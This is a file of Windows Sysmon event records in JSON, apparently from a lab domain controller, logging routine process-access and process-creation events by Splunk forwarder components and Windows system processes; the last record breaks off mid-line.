{"EventTime":"2020-08-01 07:59:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5993,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:44.019\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-20D7-5F25-0000-001050020900}\r\nTargetProcessId: 4800\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:44.019","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-20D7-5F25-0000-001050020900}","TargetProcessId":"4800","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5994,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:44.144\r\nSourceProcessGUID: {41C8662E-20F0-5F25-0000-0010304A0900}\r\nSourceProcessId: 4800\r\nSourceThreadId: 4700\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nTargetProcessId: 4576\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:44.144","SourceProcessGUID":"{41C8662E-20F0-5F25-0000-0010304A0900}","SourceProcessId":"4800","SourceThreadId":"4700","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","TargetProcessId":"4576","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5995,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:44.692\r\nProcessGuid: {41C8662E-20F0-5F25-0000-0010ED4B0900}\r\nProcessId: 5036\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Registry monitor\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-regmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nParentProcessId: 4576\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:44.692","ProcessGuid":"{41C8662E-20F0-5F25-0000-0010ED4B0900}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","FileVersion":"8.0.2","Description":"Registry monitor","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-regmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-00109F540500}","ParentProcessId":"4576","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 07:59:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5996,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:44.691\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nSourceProcessId: 4576\r\nSourceThreadId: 2580\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-20D1-5F25-0000-001014350800}\r\nTargetProcessId: 5036\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:44.691","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","SourceProcessId":"4576","SourceThreadId":"2580","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-20D1-5F25-0000-001014350800}","TargetProcessId":"5036","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5997,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:44.691\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-20D1-5F25-0000-001014350800}\r\nTargetProcessId: 5036\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:44.691","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-20D1-5F25-0000-001014350800}","TargetProcessId":"5036","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:59:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5998,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:44.691\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:44.691","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5999,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:44.691\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:44.691","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6000,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:44.691\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:44.691","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6001,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:44.691\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:44.691","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 